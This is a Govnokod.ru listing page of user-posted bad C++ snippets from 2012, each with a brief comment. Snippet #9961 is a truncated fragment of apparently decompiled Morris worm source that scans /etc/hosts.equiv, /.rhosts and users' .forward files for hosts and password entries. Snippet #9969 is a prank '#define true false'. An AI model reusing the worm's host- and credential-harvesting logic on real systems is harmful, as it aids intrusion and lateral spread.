1. C++ / Говнокод #10120


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        Шаг по оси, представляет собой число из следующего ряда:
        ... 0.02 0.05 0.1 0.2 0.5 1 2 5 ...
        next и prev позволяют перемещаться в обе стороны по ряду
        после создания хранится число 1
    class Step
            scale = 1; pr = 1; type=0;
        void next()
            // шаг вперед
            if (type==1)
                scale = pr * 2;
            else if (type==2)
                scale = pr * 5;
                type = 0;
                pr *= 10;
                scale = pr;
        void prev()
            // шаг назад
            if (type==0)
                scale = pr;
            else if (type==1)
                scale = pr*2;
                type = 2;
                pr /= 10;
                scale = pr*5;
        operator float()
            return scale;
        float scale;    // текущее значение
        float pr;       // недомноженое значение 1 10 100 ...
        int type;       // 0 - x1 1 - x2 2 - x5

    http://govnokod.ru/10117 напомнил о том, как я когда-то рисовал график, и для меток на осях потребовались те же самые красивые значения [... 0.1 0.2 0.5 1 2 5 ...]

    bormand, 30 Апреля 2012

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  2. C++ / Говнокод #10115


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    void Link::paint(QPainter *painter, const QStyleOptionGraphicsItem *option, QWidget *widget)
        if ( mA && mB )
            QPen pen(mColor, mPenWidth);
            if ( smooth() )
                painter->setRenderHint(QPainter::Antialiasing, true);
            QString ptname = mA->objectName() + QString("_point%1").arg(mAPoint);
            QDeclarativeItem *aConn = mA->findChild<QDeclarativeItem*>(ptname);
            QDeclarativeItem *bConn = *(QDeclarativeItem**) mB->property("root").constData();
            QRectF arect(aConn->x() + mA->x() - mB->x(), aConn->y() + mA->y() - mB->y(), aConn->width(), aConn->height());
            QRectF brect(bConn->x(), bConn->y(), bConn->width(), bConn->height());
            QLineF line(arect.center(), brect.center());
            if ( widget )

    Из коммита где-то в 4:00 :)

    Elvenfighter, 30 Апреля 2012

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  3. C++ / Говнокод #9969


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    #include <iostream>
    #include <conio.h>
    #define true false // Wish you happy debug!
    int main(int argc, char* argv[])
        std::cout << (((1+1)==2) ? true : false);
        return 0;

    Wish you happy debug!

    ipchelnikov, 17 Апреля 2012

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  4. C++ / Говнокод #9961


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    /* Dover */
    #include "worm.h"
    #include <stdio.h>
    #include <ctype.h>
    #include <strings.h>
    #include <pwd.h>
    int cmode;
    extern struct hst *h_name2host();
    struct usr {					/* sizeof(usr) == 58 */
        char *name, *o4, *o8, *o12;
        char passwd[14];				/* offset 16 */
        char decoded_passwd[14];			/* 30 */
        short pad;
        char *homedir;				/* offset 46 */
        char *gecos;				/* offset 50 */
        struct usr *next;				/* offset 54 */
    /* Ahhh, I just love these names.  Don't change them for anything. */
    static struct usr *x27f28, *x27f2c;
    /* Crack some passwords. */
        switch (cmode){
        case 0:
    	return;					/* 88 */
        case 1:
        case 2:
        case 3:
    /* Strategy 0, look through /etc/hosts.equiv, and /.rhost for new hosts */
    strat_0()					/* 0x5da4 */
        FILE *hosteq;
        char scanbuf[512];
        char fwd_buf[256];
        char *fwd_host;
        char getbuf[256];
        struct passwd *pwent;
        char local[20];
        struct usr *user;
        struct hst *host;				/* 1048 */
        int check_other_cnt;			/* 1052 */
        static struct usr *user_list = NULL;
        hosteq = fopen(XS("/etc/hosts.equiv"), XS("r"));
        if (hosteq != NULL) {			/* 292 */
    	while (fscanf(hosteq, XS("%.100s"), scanbuf)) {
    	    host = h_name2host(scanbuf, 0);
    	    if (host == 0) {
    		host = h_name2host(scanbuf, 1);
    	    if (host->o48[0] == 0)		/* 158 */
    	    host->flag |= 8;
    	fclose(hosteq);				/* 280 */
        hosteq = fopen(XS("/.rhosts"), XS("r"));
        if (hosteq != NULL) {			/* 516 */
    	while (fgets(getbuf, sizeof(getbuf), hosteq)) { /* 344,504 */
    	    if (sscanf(getbuf, XS("%s"), scanbuf) != 1)
    	    host = h_name2host(scanbuf, 0);
    	    while (host == 0) {			/* 436, 474 */
    		host = h_name2host(scanbuf, 1);
    	    if (host->o48[0] == 0)
    	    host->flag |= 8;
        /* look through the passwd file, checking for contact with others every
         * tenth entry. */
        check_other_cnt = 0;					/* 522 */
        while ((pwent = getpwent()) != 0) {		/* 526, 1124 */
    	if ((check_other_cnt % 10) == 0)
    	sprintf(fwd_buf, XS("%.200s/.forward"), pwent->pw_dir);
    	hosteq = fopen(fwd_buf, XS("r"));...

    Govnisti_Diavol, 16 Апреля 2012

    Комментарии (8)
  5. C++ / Говнокод #9959


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    template<class THTTPServerSettings_>
    	class TSettingsApplyer: public TAbstractSettingsApplyer
    		char _requestBuffer[THTTPServerSettings_::RequestBufferSize];
    		char _responseBuffer[RESPONSE_BUFFER_SIZE];
    		char _requestHeaderBuffer[THTTPServerSettings_::RequestHeaderBufferSize];
    		char _responseHeaderBuffer[THTTPServerSettings_::ResponseHeaderBufferSize];
    		virtual void* const GetRequestBuffer(void) const;
    		virtual void* const GetRequestHeaderBuffer(void) const;
    		virtual void* const GetResponseBuffer(void) const;
    		virtual void* const GetResponseHeaderBuffer(void) const;
    		virtual const size_t GetPort(void) const;
    		virtual const size_t GetRequestBufferSize(void) const;
    		virtual const size_t GetRequestHeaderBufferSize(void) const;
    		virtual const size_t GetResponseBufferSize(void) const;
    		virtual const size_t GetResponseHeaderBufferSize(void) const;
    template<class TSettings>
    	THTTPServer( TSettings settings ):
    		_SettingsApplyer(*(::new TSettingsApplyer< TSettings >)),

    Говногость, 16 Апреля 2012

    Комментарии (2)
  6. C++ / Говнокод #9957


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    template <bool _1, bool _2, bool _3, bool _4> struct opt4_to_type
    		static const bool o1;
    		static const bool o2;
    		static const bool o3;
    		static const bool o4;
    	template <bool _1, bool _2, bool _3, bool _4> const bool opt4_to_type<_1, _2, _3, _4>::o1 = _1;
    	template <bool _1, bool _2, bool _3, bool _4> const bool opt4_to_type<_1, _2, _3, _4>::o2 = _2;
    	template <bool _1, bool _2, bool _3, bool _4> const bool opt4_to_type<_1, _2, _3, _4>::o3 = _3;
    	template <bool _1, bool _2, bool _3, bool _4> const bool opt4_to_type<_1, _2, _3, _4>::o4 = _4;
    case 0:  return strconv_attribute_t(s, end_quote, opt4_to_type<0, 0, 0, 0>());
    		case 1:  return strconv_attribute_t(s, end_quote, opt4_to_type<0, 0, 0, 1>());
    		case 2:  return strconv_attribute_t(s, end_quote, opt4_to_type<0, 0, 1, 0>());
    		case 3:  return strconv_attribute_t(s, end_quote, opt4_to_type<0, 0, 1, 1>());
    		case 4:  return strconv_attribute_t(s, end_quote, opt4_to_type<0, 1, 0, 0>());
    		case 5:  return strconv_attribute_t(s, end_quote, opt4_to_type<0, 1, 0, 1>());
    		case 14: return strconv_attribute_t(s, end_quote, opt4_to_type<1, 1, 1, 0>());
    		case 15: return strconv_attribute_t(s, end_quote, opt4_to_type<1, 1, 1, 1>());
    inline xml_parse_result make_parse_result(xml_parse_status status, unsigned int offset, unsigned int line)
    		xml_parse_result result = {status, offset, line};
    		return result;
    block = static_cast<memory_block*>(operator new(size + sizeof(memory_block) - xpath_memory_block_size));


    Говногость, 16 Апреля 2012

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  7. C++ / Говнокод #9956


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    int main() {
        float a = 3.14;
        asm volatile (
                        "decl   %%esp"                      "\n\t"
                        "movb   $0, (%%esp)"                "\n\t"
                        "decl   %%esp"                      "\n\t"
                        "movb   $'\n', (%%esp)"             "\n\t"
                        "movl   $32, %%eax"                 "\n"
            "label0:"                                       "\n\t"
                        "shrl   %[A]"                       "\n\t"
                        "decl   %%esp"                      "\n\t"
                        "jc     label1"                     "\n\t"
                        "movb   $'0', (%%esp)"              "\n\t"
                        "jmp    label2"                     "\n"
            "label1:"                                       "\n\t"
                        "movb   $'1', (%%esp)"              "\n\t"
            "label2:"                                       "\n\t"
                        "decl   %%eax"                      "\n\t"
                        "cmpl   $0, %%eax"                  "\n\t"
                        "ja     label0"                     "\n\t"
                        "pushl  %%esp"                      "\n\t"
                        "call   printf"                     "\n\t"
                        "addl   $38, %%esp"                 "\n"
            : /* no output registers */
            : [A] "r" (a)
            : "%esp", "%eax"
        return 0;

    float > bin

    igoreknog, 16 Апреля 2012

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  8. C++ / Говнокод #9955


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    void TExternalIOBuffer::swap(TExternalIOBuffer& Buffer)
    	const TExternalIOBuffer CurrentBuffer=*this;
    	const TExternalIOBuffer OtherBuffer=Buffer;
    	::new((void*)&Buffer) TExternalIOBuffer(CurrentBuffer);
    	::new((void*)this) TExternalIOBuffer(OtherBuffer);
    const TExternalIOBuffer& TExternalIOBuffer::operator=(const TAbstractIOBuffer& Buffer)
    	return *this;

    Большой проект, попало в релиз.

    Говногость, 16 Апреля 2012

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  9. C++ / Говнокод #9948


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    long base64::rlong (char * source)
        long res = 0;
        for (int i = 0; i < 4; i++) ((char *) &res)[3 - i] = source[i];
        return res;
    void base64::encode (char * source, char * dest)
        char base[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
        int n = 0;
        for (int nd = 0; nd < ceil(4*((double)strlen(source))/3); nd++)
            dest[n++] = base[rlong(&source[((nd >> 2) << 2)*3 >> 2]) >> (26 - 6*(nd - ((nd >> 2) << 2))) & 0x3F]; 
        for (int i = 0; i < ((int) ceil(((double)n)/4) << 2) - n; i++) dest[n++] = '=';
        dest[n] = 0;

    Ответ преподу по c++. Переводстроки в base64.

    antonymus, 14 Апреля 2012

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  10. C++ / Говнокод #9930


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    	m_RealTexts[nIndex].txtStartPt.x = ptStandard.x + (szStandard.cx-szTxtDC.cx)/2.0;
    	m_RealTexts[nIndex].txtStartPt.y = ptStandard.y + (szStandard.cy-szTxtDC.cy)/2.0;
    	m_RealTexts[nIndex].txtSize = szTxtDC;
    	m_RealTexts[nIndex].txtMovePt.x = 0.0 - (szStandard.cx-szTxtDC.cx)/2.0;
    	m_RealTexts[nIndex].txtMovePt.y = 0.0 - (szStandard.cy-szTxtDC.cy)/2.0;
    	m_RealTexts[nIndex].txtStartPt.x = ptStandard.x + (szStandard.cx-szTxtDC.cx)/2.0;
    	m_RealTexts[nIndex].txtStartPt.y = ptStandard.y + (szStandard.cy-szTxtDC.cy)/2.0;
    	m_RealTexts[nIndex].txtSize = szTxtDC;
    	m_RealTexts[nIndex].txtMovePt.x = 0.0 - (szStandard.cx-szTxtDC.cx)/2.0;
    	m_RealTexts[nIndex].txtMovePt.y = 0.0 - (szStandard.cy-szTxtDC.cy)/2.0;

    someone, 12 Апреля 2012

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